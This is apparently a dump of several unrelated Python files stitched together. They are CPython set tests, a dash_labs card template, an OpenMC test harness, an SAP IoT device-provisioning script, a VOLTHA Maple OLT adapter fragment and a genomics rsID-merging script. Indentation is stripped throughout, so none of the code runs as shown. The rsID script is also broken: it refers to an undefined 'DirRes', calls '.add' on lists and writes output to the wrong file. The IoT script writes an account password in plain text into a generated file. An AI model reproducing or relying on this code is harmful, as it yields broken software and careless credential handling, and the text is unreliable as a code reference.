self.assertEqual(sorted(cons(g(s)), key=repr), sorted(g(s), key=repr))
self.assertRaises(TypeError, cons , X(s))
self.assertRaises(TypeError, cons , N(s))
self.assertRaises(ZeroDivisionError, cons , E(s))
def test_inline_methods(self):
s = set('november')
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for meth in (s.union, s.intersection, s.difference, s.symmetric_difference, s.isdisjoint):
for g in (G, I, Ig, L, R):
expected = meth(data)
actual = meth(g(data))
if isinstance(expected, bool):
self.assertEqual(actual, expected)
else:
self.assertEqual(sorted(actual, key=repr), sorted(expected, key=repr))
self.assertRaises(TypeError, meth, X(s))
self.assertRaises(TypeError, meth, N(s))
self.assertRaises(ZeroDivisionError, meth, E(s))
def test_inplace_methods(self):
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for methname in ('update', 'intersection_update',
'difference_update', 'symmetric_difference_update'):
for g in (G, I, Ig, S, L, R):
s = set('january')
t = s.copy()
getattr(s, methname)(list(g(data)))
getattr(t, methname)(g(data))
self.assertEqual(sorted(s, key=repr), sorted(t, key=repr))
self.assertRaises(TypeError, getattr(set('january'), methname), X(data))
self.assertRaises(TypeError, getattr(set('january'), methname), N(data))
self.assertRaises(ZeroDivisionError, getattr(set('january'), methname), E(data))
class bad_eq:
def __eq__(self, other):
if be_bad:
set2.clear()
raise ZeroDivisionError
return self is other
def __hash__(self):
return 0
class bad_dict_clear:
def __eq__(self, other):
if be_bad:
dict2.clear()
return self is other
def __hash__(self):
return 0
class TestWeirdBugs(unittest.TestCase):
def test_8420_set_merge(self):
# This used to segfault
global be_bad, set2, dict2
be_bad = False
set1 = {bad_eq()}
set2 = {bad_eq() for i in range(75)}
be_bad = True
self.assertRaises(ZeroDivisionError, set1.update, set2)
be_bad = False
set1 = {bad_dict_clear()}
dict2 = {bad_dict_clear(): None}
be_bad = True
set1.symmetric_difference_update(dict2)
def test_iter_and_mutate(self):
# Issue #24581
s = set(range(100))
s.clear()
s.update(range(100))
si = iter(s)
s.clear()
a = list(range(100))
s.update(range(100))
list(si)
def test_merge_and_mutate(self):
class X:
def __hash__(self):
return hash(0)
def __eq__(self, o):
other.clear()
return False
other = set()
other = {X() for i in range(10)}
s = {0}
s.update(other)
# Application tests (based on David Eppstein's graph recipes ====================================
def powerset(U):
"""Generates all subsets of a set or sequence U."""
U = iter(U)
try:
x = frozenset([next(U)])
for S in powerset(U):
yield S
yield S | x
except StopIteration:
yield frozenset()
def cube(n):
"""Graph of n-dimensional hypercube."""
singletons = [frozenset([x]) for x in range(n)]
return dict([(x, frozenset([x^s for s in singletons]))
for x in powerset(range(n))])
def linegraph(G):
"""Graph, the vertices of which are edges of G,
with two vertices being adjacent iff the corresponding
edges share a vertex."""
L = {}
for x in G:
for y in G[x]:
nx = [frozenset([x,z]) for z in G[x] if z != y]
ny = [frozenset([y,z]) for z in G[y] if z != x]
L[frozenset([x,y])] = frozenset(nx+ny)
return L
def faces(G):
'Return a set of faces in G. Where a face is a set of vertices on that face'
# currently limited to triangles,squares, and pentagons
f = set()
for v1, edges in G.items():
for v2 in edges:
for v3 in G[v2]:
if v1 == v3:
continue
if v1 in G[v3]:
f.add(frozenset([v1, v2, v3]))
else:
for v4 in G[v3]:
if v4 == v2:
continue
if v1 in G[v4]:
f.add(frozenset([v1, v2, v3, v4]))
else:
for v5 in G[v4]:
if v5 == v3 or v5 == v2:
continue
if v1 in G[v5]:
f.add(frozenset([v1, v2, v3, v4, v5]))
return f
class TestGraphs(unittest.TestCase):
def test_cube(self):
g = cube(3) # vert --> {v1, v2, v3}
vertices1 = set(g)
self.assertEqual(len(vertices1), 8) # eight vertices
for edge in g.values():
self.assertEqual(len(edge), 3) # each vertex connects to three edges
vertices2 = set(v for edges in g.values() for v in edges)
self.assertEqual(vertices1, vertices2) # edge vertices in original set
cubefaces = faces(g)
self.assertEqual(len(cubefaces), 6) # six faces
for face in cubefaces:
self.assertEqual(len(face), 4) # each face is a square
def test_cuboctahedron(self):
# http://en.wikipedia.org/wiki/Cuboctahedron
# 8 triangular faces and 6 square faces
# 12 identical vertices each connecting a triangle and square
g = cube(3)
cuboctahedron = linegraph(g) # V( --> {V1, V2, V3, V4}
self.assertEqual(len(cuboctahedron), 12)# twelve vertices
vertices = set(cuboctahedron)
for edges in cuboctahedron.values():
self.assertEqual(len(edges), 4) # each vertex connects to four other vertices
othervertices = set(edge for edges in cuboctahedron.values() for edge in edges)
self.assertEqual(vertices, othervertices) # edge vertices in original set
cubofaces = faces(cuboctahedron)
facesizes = collections.defaultdict(int)
for face in cubofaces:
facesizes[len(face)] += 1
self.assertEqual(facesizes[3], 8) # eight triangular faces
self.assertEqual(facesizes[4], 6) # six square faces
for vertex in cuboctahedron:
edge = vertex # Cuboctahedron vertices are edges in Cube
self.assertEqual(len(edge), 2) # Two cube vertices define an edge
for cubevert in edge:
self.assertIn(cubevert, g)
#==============================================================================
if __name__ == "__main__":
unittest.main()
|
py | 1a49edfa9a094248e2ae8b0bcb70ba249af497e4 | from dash_labs.templates.base import BaseTemplate
import dash_html_components as html
class HtmlCard(BaseTemplate):
"""
Simple template that places all components in a few html Div elements with a
card-like border.
"""
_valid_locations = ("bottom", "top")
_default_input_location = "bottom"
_default_output_location = "top"
def __init__(self, app, title=None, width=None):
super().__init__(app)
self.title = title
self.width = width
def _perform_layout(self):
# No callbacks here. Must be constant or idempotent
children = []
if self.title:
children.append(html.H2(self.title))
children.append(html.Div(self.get_containers("top")))
children.append(html.Hr())
children.append(html.Div(self.get_containers("bottom")))
layout = html.Div(
style={
"width": self.width,
"border": "1px solid lightgray",
"padding": 10,
"border-radius": "6px",
},
children=html.Div(children=children),
)
return layout
|
py | 1a49ee8a82012301d238a42230e1063498dda0c3 | #!/usr/bin/env python
import os
import sys
sys.path.insert(0, os.pardir)
from testing_harness import TestHarness, PyAPITestHarness
import openmc
class MGBasicTestHarness(PyAPITestHarness):
def _build_inputs(self):
super(MGBasicTestHarness, self)._build_inputs()
if __name__ == '__main__':
harness = MGBasicTestHarness('statepoint.10.*', False, mg=True)
harness.main()
|
py | 1a49eef1046e93e426aa4761074ac4bc9847a015 | # create an IoTS device of choice with just one program
# and no necessary human interaction
# write a script for credential conversion
# finally write 2 scripts to ingest using the converted credentials / retrieve
config_host='<hostname>'
config_instance='<instance id>'
config_tenant='<tenant id>'
config_user='<user>'
config_password='<password>'
config_alternateId_4_device_base='<chosen alternateId base>'
config_alternateId_4_device_version='_01'
import sys
import requests
import json
alternateId_4_device=config_alternateId_4_device_base+config_alternateId_4_device_version
alternateId_4_capability_up01='c_up01_' + config_alternateId_4_device_base
alternateId_4_capability_up02='c_up02_' + config_alternateId_4_device_base
alternateId_4_sensortype=config_alternateId_4_device_base
alternateId_4_sensor=alternateId_4_device
certfile_name='./cert.pem'
# ========================================================================
# these values are filled as you go through the steps
gw_id_4_rest=''
my_device=''
my_capability_up01=''
my_capability_up02=''
my_sensortype=''
my_sensor=''
# ========================================================================
print('listing gateways')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/gateways'
headers={'Content-Type' : 'application/json'}
response=requests.get(request_url, headers=headers, auth=(config_user, config_password))
status_code=response.status_code
if (status_code == 200):
print(response.text)
try:
json_payload=json.loads(response.text)
for individual_dataset in json_payload:
print(individual_dataset['id'] + ' - ' + individual_dataset['protocolId'])
if ((individual_dataset['protocolId'] == 'rest') and (individual_dataset['status'] == 'online')):
gw_id_4_rest=individual_dataset['id']
print('Using gateway: ' + gw_id_4_rest)
except (ValueError) as e:
print(e)
# ===
print('creating the device')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/devices'
headers={'Content-Type' : 'application/json'}
payload='{ "gatewayId" : "' + gw_id_4_rest + '", "name" : "device_' + alternateId_4_device + '", "alternateId" : "' + alternateId_4_device + '" }'
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_device=json_payload['id']
print('Using device id: ' + my_device)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('retrieving the certificate')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/devices/' + my_device + '/authentications/clientCertificate/pem'
headers={'Content-Type' : 'application/json'}
response=requests.get(request_url, headers=headers, auth=(config_user, config_password))
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
secret=json_payload['secret']
pem=json_payload['pem']
print('secret: ' + secret)
print('pem: ' + pem)
certfile=open("cert.pem", "w")
certfile.write(pem)
certfile.close()
pem_script=open("convert_pem.sh", "w")
pem_script.write("echo 'Please use pass phrase " + secret + " for the certificate import from " + certfile_name + " in the conversion !'\n\n")
pem_script.write("openssl rsa -in " + certfile_name + " -out credentials.key\n")
pem_script.write("openssl x509 -in " + certfile_name + " -out credentials.crt\n")
pem_script.close()
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the capability (up01)')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/capabilities'
headers={'Content-Type' : 'application/json'}
payload='{ "name" : "capability_up01_' + alternateId_4_capability_up01 + '", "properties" : [ { "name" : "p01_up01", "dataType" : "string" }, { "name" : "p02_up01", "dataType" : "string" } ], "alternateId" : "' + alternateId_4_capability_up01 + '" }'
print(payload)
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_capability_up01=json_payload['id']
print('Using (for up01) capability id: ' + my_capability_up01)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the capability (up02)')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/capabilities'
headers={'Content-Type' : 'application/json'}
payload='{ "name" : "capability_up02_' + alternateId_4_capability_up02 + '", "properties" : [ { "name" : "p01_up02", "dataType" : "string" }, { "name" : "p02_up02", "dataType" : "string" } ], "alternateId" : "' + alternateId_4_capability_up02 + '" }'
print(payload)
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_capability_up02=json_payload['id']
print('Using (for up02) capability id: ' + my_capability_up02)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the sensortype')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/sensorTypes'
headers={'Content-Type' : 'application/json'}
payload='{ "name" : "sensortype_' + alternateId_4_sensortype + '", "capabilities" : [ { "id" : "' + my_capability_up01 + '", "type" : "measure" }, { "id" : "' + my_capability_up02 + '", "type" : "measure" } ] }'
# so far the alternateId for a sensorType needs to be a positive integer - so the code below does not work
# payload='{ "name" : "sensortype_' + alternateId_4_sensortype + '", "capabilities" : [ { "id" : "' + my_capability_up01 + '", "type" : "measure" }, { "id" : "' + my_capability_up02 + '", "type" : "measure" } ], "alternateId" : "' + alternateId_4_sensortype + '" }'
# print(payload)
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_sensortype=json_payload['id']
print('Using sensortype id: ' + my_sensortype)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the sensor')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/sensors'
headers={'Content-Type' : 'application/json'}
payload='{ "name": "sensor_' + alternateId_4_sensor + '", "deviceId" : "' + my_device + '", "sensorTypeId" : "' + my_sensortype + '", "alternateId" : "' + alternateId_4_sensor + '" }'
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_sensor=json_payload['id']
print('Using sensor id: ' + my_sensor)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
# now also write a separate script to ingest data
ingest_script=open("ingest.py", "w")
ingest_script.write("import requests\n\n")
ingest_script.write("config_host='" + config_host + "'\n")
ingest_script.write("config_alternateId_4_device='" + alternateId_4_device + "'\n")
ingest_script.write("config_alternateId_4_capability_up01='c_up01_" + config_alternateId_4_device_base + "'\n")
ingest_script.write("config_alternateId_4_capability_up02='c_up02_" + config_alternateId_4_device_base + "'\n")
ingest_script.write('''
alternateId_4_sensor=config_alternateId_4_device
request_url='https://' + config_host + '/iot/gateway/rest/measures/' + config_alternateId_4_device
# ingest for capability up01
payload='{ \"capabilityAlternateId\" : \"' + config_alternateId_4_capability_up01 + '\", \"measures\" : [[ \"value for p01_up01\", \"value for p02_up01\" ]], \"sensorAlternateId\":\"' + alternateId_4_sensor + '\" }'
headers={'Content-Type' : 'application/json'}
response=requests.post(request_url, data=payload, headers=headers, cert=('./credentials.crt', './credentials.key'))
print(response.status_code)
print(response.text)
# ingest for capability up02
payload='{ \"capabilityAlternateId\" : \"' + config_alternateId_4_capability_up02 + '\", \"measures\" : [[ \"value for p01_up02\", \"value for p02_up02\" ]], \"sensorAlternateId\":\"' + alternateId_4_sensor + '\" }'
headers={'Content-Type' : 'application/json'}
response=requests.post(request_url, data=payload, headers=headers, cert=('./credentials.crt', './credentials.key'))
print(response.status_code)
print(response.text)
''')
ingest_script.close()
# ===
# now also write a separate script to retrieve data
retrieve_script=open("retrieve.py", "w")
retrieve_script.write("import requests\n")
retrieve_script.write("import json\n\n")
retrieve_script.write("config_host='" + config_host + "'\n")
retrieve_script.write("config_tenant='" + config_tenant + "'\n")
retrieve_script.write("config_user='" + config_user + "'\n")
retrieve_script.write("config_password='" + config_password + "'\n\n")
retrieve_script.write("config_my_device='" + my_device + "'\n")
retrieve_script.write("config_my_capability_up01='" + my_capability_up01 + "'\n")
retrieve_script.write('''
request_url='https://' + config_host + '/iot/processing/api/v1/tenant/' + config_tenant + '/measures/capabilities/' + config_my_capability_up01 + '?orderby=timestamp%20desc&filter=deviceId%20eq%20%27' + config_my_device + '%27&skip=0&top=100'
headers={'Content-Type' : 'application/json'}
response=requests.get(request_url, headers=headers, auth=(config_user, config_password))
status_code=response.status_code
if (status_code == 200):
print(response.text)
try:
json_payload=json.loads(response.text)
for individual_measure in json_payload:
print('value: ' + str(individual_measure['measure']))
except (ValueError) as e:
print(e)
''')
retrieve_script.close()
print("=== summary ===")
print("device: " + str(my_device) + " altId: " + str(alternateId_4_device))
print("capability up01: " + str(my_capability_up01) + " altId: " + str(alternateId_4_capability_up01))
print("capability up02: " + str(my_capability_up02) + " altId: " + str(alternateId_4_capability_up02))
print("sensortype: " + str(my_sensortype))
print("sensor: " + str(my_sensor) + " altId: " + str(alternateId_4_sensor))
print("=== summary ===")
# ===
|
py | 1a49ef347f05e01bdbd1c7e3c6e7be2d538ffb2b | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Houwen Peng and Zhipeng Zhang
# Details: import other paths
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as osp
import sys
def add_path(path):
if path not in sys.path:
sys.path.insert(0, path)
this_dir = osp.dirname(__file__)
lib_path = osp.join(this_dir, '..', 'lib')
add_path(lib_path)
|
py | 1a49ef907243d811a66ad28281ec08afb5dfeb75 | #!/usr/bin/env python3
import sys
import os
import argparse
def parseArguments():
parser = argparse.ArgumentParser(description='transform file and header')
parser.add_argument("--list_file", help="", type=str,required=True)
parser.add_argument('--use_rs',type=str,help="if need to be limited at some rs", default=0)
parser.add_argument("--out", help="output format ldsc, default none", type=str,required=True)
args = parser.parse_args()
return args
args=parseArguments()
splfile=args.list_file.split(',')
DicByRs={}
listRs=list([])
listChrBp={}
rsissue=''
listrsissue=list([])
listchrissue=list([])
for File in splfile :
print(File)
Fread=open(File)
FreadL=Fread.readline().split()
Fread.close()
Fread=open(File)
if len(FreadL)==3 :
for line in Fread :
splt=line.replace('\n', '').split()
if splt[0] not in listRs :
DicByRs[splt[0]]=[None,None,splt[1],splt[2],None]
else :
RsInfo=DirRes[splt[0]]
##
print(RsInfo)
balisegood= (splt[1]==RsInfo[2] and splt[2]==RsInfo[3]) or (splt[1]==RsInfo[3] and splt[2]==RsInfo[2])
if balisegood ==False:
listrsissue.add(splt[1])
elif len(FreadL)==6:
# writenew.write('rsID\tChro\tPos\tA1\tA2\tnewRs\n')
for line in Fread :
splt=line.replace('\n', '').split()
NewRs=splt[5]
if splt[0] not in listRs :
DicByRs[splt[0]]=[splt[1],splt[2],splt[3],splt[4], splt[5]]
else :
balisegood= (splt[1]==RsInfo[2] and splt[2]==RsInfo[3]) or (splt[1]==RsInfo[3] and splt[2]==RsInfo[2])
RsInfo=DirRes[splt[0]]
if balisegood ==False:
listrsissue.add(splt[1])
listchrissue.add()
# check pos and chr
if RsInfo[0] :
if RsInfo[0] != splt[1] and RsInfo[1] != splt[2] :
listrsissue.add(splt[0])
else :
RsInfo[0]=splt[1]
RsInfo[1]=splt[2]
RsInfo[4]=splt[5]
else :
print("colomn error number :"+str(len(FreadL)))
sys.exit(3)
writeRs=open(args.out, 'w')
writeRs2=open(args.out+'_allinfo', 'w')
for rs in DicByRs:
RsInfo=DicByRs[rs]
if rs not in listrsissue :
if args.use_rs==1 :
writeRs.write(rs+'\t'+RsInfo[3]+'\t'+RsInfo[4]+'\n')
else :
writeRs.write(rs+'\t'+'\t'.join(RsInfo)+'\n')
writeRs2.write(rs+'\t'+'\t'.join(RsInfo)+'\n')
writeRsError=open(args.out+'_issue', 'w')
for rs in listrsissue :
RsInfo=DicByRs[rs]
writeRs.write(rs+'\t'+'\t'.join(RsInfo)+'\n')
|
py | 1a49ef9673f1fcd6a6fdf6bc100240c4f9d9b6a7 | #
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Maple OLT/ONU adapter.
"""
from uuid import uuid4
import arrow
import binascii
from scapy.layers.l2 import Ether, Dot1Q
from twisted.internet import reactor
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.spread import pb
from twisted.internet.defer import inlineCallbacks, returnValue, DeferredQueue
from zope.interface import implementer
from common.frameio.frameio import BpfProgramFilter, hexify
from voltha.adapters.interface import IAdapterInterface
from voltha.core.logical_device_agent import mac_str_to_tuple
import voltha.core.flow_decomposer as fd
from voltha.protos import third_party
from voltha.protos.adapter_pb2 import Adapter
from voltha.protos.adapter_pb2 import AdapterConfig
from voltha.protos.common_pb2 import LogLevel, OperStatus, ConnectStatus, \
AdminState
from voltha.protos.device_pb2 import DeviceType, DeviceTypes, Port, Device, \
PmConfigs, PmConfig, PmGroupConfig
from voltha.protos.health_pb2 import HealthStatus
from google.protobuf.empty_pb2 import Empty
from voltha.protos.events_pb2 import KpiEvent, MetricValuePairs
from voltha.protos.events_pb2 import KpiEventType
from voltha.protos.events_pb2 import AlarmEvent, AlarmEventType, \
AlarmEventSeverity, AlarmEventState, AlarmEventCategory
from voltha.protos.logical_device_pb2 import LogicalPort, LogicalDevice
from voltha.protos.openflow_13_pb2 import OFPPS_LIVE, OFPPF_FIBER, \
OFPPF_1GB_FD, OFPC_GROUP_STATS, OFPC_PORT_STATS, OFPC_TABLE_STATS, \
OFPC_FLOW_STATS, OFPP_CONTROLLER, OFPXMC_OPENFLOW_BASIC, \
ofp_switch_features, ofp_desc, ofp_port
from voltha.registry import registry
from voltha.extensions.omci.omci import *
_ = third_party
log = structlog.get_logger()
PACKET_IN_VLAN = 4091
is_inband_frame = BpfProgramFilter('(ether[14:2] & 0xfff) = 0x{:03x}'.format(
PACKET_IN_VLAN))
class MapleOltPmMetrics:
class Metrics:
def __init__(self, config, value=0, is_group=False):
self.config = config
self.value = value
self.is_group = is_group
def __init__(self,device):
self.pm_names = {'tx_64','tx_65_127', 'tx_128_255', 'tx_256_511',
'tx_512_1023', 'tx_1024_1518', 'tx_1519_9k', 'rx_64',
'rx_65_127', 'rx_128_255', 'rx_256_511', 'rx_512_1023',
'rx_1024_1518', 'rx_1519_9k', 'tx_pkts', 'rx_pkts',
'tx_bytes', 'rx_bytes'}
self.pm_group_names = {'nni'}
self.device = device
self.id = device.id
self.default_freq = 150
self.pon_metrics = dict()
self.nni_metrics = dict()
for m in self.pm_names:
self.pon_metrics[m] = \
self.Metrics(config = PmConfig(name=m,
type=PmConfig.COUNTER,
enabled=True), value = 0)
self.nni_metrics[m] = \
self.Metrics(config = PmConfig(name=m,
type=PmConfig.COUNTER,
enabled=True), value = 0)
self.pm_group_metrics = dict()
for m in self.pm_group_names:
self.pm_group_metrics[m] = \
self.Metrics(config = PmGroupConfig(group_name=m,
group_freq=self.default_freq,
enabled=True),
is_group = True)
for m in sorted(self.nni_metrics):
pm=self.nni_metrics[m]
self.pm_group_metrics['nni'].config.metrics.extend([PmConfig(
name=pm.config.name,
type=pm.config.type,
enabled=pm.config.enabled)])
@inlineCallbacks
def configure_pm_collection_freq(self, freq, remote):
log.info('configuring-pm-collection-freq',
freq=freq)
try:
data = yield remote.callRemote('set_stats_collection_interval', 0,
freq)
log.info('configured-pm-collection-freq', data=data)
except Exception as e:
log.exception('configure-pm-collection-freq', exc=str(e))
def enable_pm_collection(self, pm_group, remote):
if pm_group == 'nni':
self.configure_pm_collection_freq(self.default_freq/10, remote)
def disable_pm_collection(self, pm_group, remote):
if pm_group == 'nni':
self.configure_pm_collection_freq(0, remote)
def update(self, device, pm_config, remote):
if self.default_freq != pm_config.default_freq:
self.default_freq = pm_config.default_freq
if pm_config.grouped is True:
for m in pm_config.groups:
self.pm_group_metrics[m.group_name].config.enabled = m.enabled
if m.enabled is True:
self.enable_pm_collection(m.group_name, remote)
else:
self.disable_pm_collection(m.group_name, remote)
else:
for m in pm_config.metrics:
self.pon_metrics[m.name].config.enabled = m.enabled
self.nni_metrics[m.name].config.enabled = m.enabled
def make_proto(self):
pm_config = PmConfigs(
id=self.id,
default_freq=self.default_freq,
grouped = True,
freq_override = False)
for m in self.pm_group_names:
pm_config.groups.extend([self.pm_group_metrics[m].config])
return pm_config
class MapleOltRxHandler(pb.Root):
def __init__(self, device_id, adapter, onu_queue):
self.device_id = device_id
self.adapter = adapter
self.onu_discovered_queue = onu_queue
self.adapter_agent = adapter.adapter_agent
self.adapter_name = adapter.name
# registry('main').get_args().external_host_address
self.pb_server_ip = '192.168.24.20'
self.pb_server_port = 24497
self.pb_server_factory = pb.PBServerFactory(self)
# start PB server
self.listen_port = reactor.listenTCP(self.pb_server_port,
self.pb_server_factory)
self.omci_rx_queue = DeferredQueue()
log.info('PB-server-started-on-port', port=self.pb_server_port)
def get_ip(self):
return self.pb_server_ip
def get_port(self):
return self.pb_server_port
def get_host(self):
return self.listen_port.getHost()
def remote_echo(self, pkt_type, pon, onu, port, crc_ok, msg_size, msg_data):
log.info('received-omci-msg',
pkt_type=pkt_type,
pon_id=pon,
onu_id=onu,
port_id=port,
crc_ok=crc_ok,
msg_size=msg_size,
msg_data=hexify(msg_data))
self.omci_rx_queue.put((onu, msg_data))
def receive_omci_msg(self):
return self.omci_rx_queue.get()
def remote_report_stats(self, _object, key, stats_data):
log.info('received-stats-msg',
object=_object,
key=key,
stats=stats_data)
prefix = 'voltha.{}.{}'.format(self.adapter_name, self.device_id)
try:
ts = arrow.utcnow().timestamp
prefixes = {
prefix + '.nni': MetricValuePairs(metrics=stats_data)
}
kpi_event = KpiEvent(
type=KpiEventType.slice,
ts=ts,
prefixes=prefixes
)
self.adapter_agent.submit_kpis(kpi_event)
except Exception as e:
log.exception('failed-to-submit-kpis', e=e)
def remote_report_event(self, _object, key, event, event_data=None):
def _convert_serial_data(data):
b = bytearray()
b.extend(data)
return binascii.hexlify(b)
log.info('received-event-msg',
object=_object,
key=key,
event_str=event,
event_data=event_data)
if _object == 'device':
# key: {'device_id': <int>}
# event: 'state-changed'
# event_data: {'state_change_successful': <False|True>,
# 'new_state': <str> ('active-working'|'inactive')}
pass
elif _object == 'nni':
# key: {'device_id': <int>, 'nni': <int>}
pass
elif _object == 'pon_ni':
# key: {'device_id': <int>, 'pon_ni': <int>}
# event: 'state-changed'
# event_data: {'state_change_successful': <False|True>,
# 'new_state': <str> ('active-working'|'inactive')}
#
# event: 'onu-discovered'
# event_data: {'serial_num_vendor_id': <str>
# 'serial_num_vendor_specific': <str>
# 'ranging_time': <int>
# 'onu_id': <int>
# 'us_line_rate': <int> (0=2.5G, 1=10G)
# 'ds_pon_id': <int>
# 'us_pon_id': <int>
# 'tuning_granularity': <int>
# 'step_tuning_time': <int>
# 'attenuation': <int>
# 'power_levelling_caps': <int>}
if 'onu-discovered' == event and event_data is not None:
event_data['_device_id'] = key['device_id'] if 'device_id' in key else None
event_data['_pon_id'] = key['pon_id'] if 'pon_id' in key else None
event_data['_vendor_id'] = _convert_serial_data(event_data['serial_num_vendor_id']) \
if 'serial_num_vendor_id' in event_data else None
event_data['_vendor_specific'] = _convert_serial_data(event_data['serial_num_vendor_specific']) \
if 'serial_num_vendor_specific' in event_data else None
self.onu_discovered_queue.put(event_data)
log.info('onu-discovered-event-added-to-queue', event_data=event_data)
elif _object == 'onu':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>}
# event: 'activation-completed'
# event_data: {'activation_successful': <False|True>,
# act_fail_reason': <str>}
#
# event: 'deactivation-completed'
# event_data: {'deactivation_successful': <False|True>}
#
# event: 'ranging-completed'
# event_data: {'ranging_successful': <False|True>,
# 'ranging_fail_reason': <str>,
# 'eqd': <int>,
# 'number_of_ploams': <int>,
# 'power_level': <int>}
#
# event: 'enable-completed'
# event_data: {'serial_num-vendor_id': <str>
# 'serial_num-vendor_specific: <str>}
#
# event: 'disable-completed'
# event_data: {'serial_num-vendor_id': <str>
# 'serial_num-vendor_specific: <str>}
# Get child_device from onu_id
child_device = self.adapter_agent.get_child_device(self.device_id, onu_id=key['onu_id'])
assert child_device is not None
# Build the message, the ONU adapter uses the proxy_address
# to uniquely identify a specific ONU
msg = {'proxy_address':child_device.proxy_address, 'event':event, 'event_data':event_data}
# Send the event message to the ONU adapter
self.adapter_agent.publish_inter_adapter_message(child_device.id, msg)
elif _object == 'alloc_id':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>, 'alloc_id': ,<int>}
pass
elif _object == 'gem_port':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>, 'gem_port': ,<int>}
pass
elif _object == 'trx':
# key: {'device_id': <int>, 'pon_ni': <int>}
pass
elif _object == 'flow_map':
# key: {'device_id': <int>, 'pon_ni': <int>}
pass
def remote_report_alarm(self, _object, key, alarm, status, priority,
alarm_data=None):
log.info('received-alarm-msg',
object=_object,
key=key,
alarm=alarm,
status=status,
priority=priority,
alarm_data=alarm_data)
id = 'voltha.{}.{}.{}'.format(self.adapter_name, self.device_id, _object)
description = '{} Alarm - {} - {}'.format(_object.upper(), alarm.upper(),
'Raised' if status else 'Cleared')
if priority == 'low':
severity = AlarmEventSeverity.MINOR
elif priority == 'medium':
severity = AlarmEventSeverity.MAJOR
elif priority == 'high':
severity = AlarmEventSeverity.CRITICAL
else:
severity = AlarmEventSeverity.INDETERMINATE
try:
ts = arrow.utcnow().timestamp
alarm_event = self.adapter_agent.create_alarm(
id=id,
resource_id=str(key),
type=AlarmEventType.EQUIPMENT,
category=AlarmEventCategory.PON,
severity=severity,
state=AlarmEventState.RAISED if status else AlarmEventState.CLEARED,
description=description,
context=alarm_data,
raised_ts = ts)
self.adapter_agent.submit_alarm(self.device_id, alarm_event)
except Exception as e:
log.exception('failed-to-submit-alarm', e=e)
# take action based on alarm type, only pon_ni and onu objects report alarms
if object == 'pon_ni':
# key: {'device_id': <int>, 'pon_ni': <int>}
# alarm: 'los'
# status: <False|True>
pass
elif object == 'onu':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>}
# alarm: <'los'|'lob'|'lopc_miss'|'los_mic_err'|'dow'|'sf'|'sd'|'suf'|'df'|'tiw'|'looc'|'dg'>
# status: <False|True>
pass
@implementer(IAdapterInterface)
class MapleOltAdapter(object):
name = 'maple_olt'
supported_device_types = [
DeviceType(
id=name,
adapter=name,
accepts_bulk_flow_update=True
)
]
def __init__(self, adapter_agent, config):
self.adapter_agent = adapter_agent
self.config = config
self.descriptor = Adapter(
id=self.name,
vendor='Voltha project',
version='0.4',
config=AdapterConfig(log_level=LogLevel.INFO)
)
self.devices_handlers = dict() # device_id -> MapleOltHandler()
self.logical_device_id_to_root_device_id = dict()
# register for adapter messages
self.adapter_agent.register_for_inter_adapter_messages()
def start(self):
log.debug('starting')
log.info('started')
def stop(self):
log.debug('stopping')
log.info('stopped')
def adapter_descriptor(self):
return self.descriptor
def device_types(self):
return DeviceTypes(items=self.supported_device_types)
def health(self):
return HealthStatus(state=HealthStatus.HealthState.HEALTHY)
def change_master_state(self, master):
raise NotImplementedError()
def update_pm_config(self, device, pm_config):
log.info("adapter-update-pm-config", device=device, pm_config=pm_config)
handler = self.devices_handlers[device.id]
handler.update_pm_metrics(device, pm_config)
def adopt_device(self, device):
log.info("adopt-device", device=device)
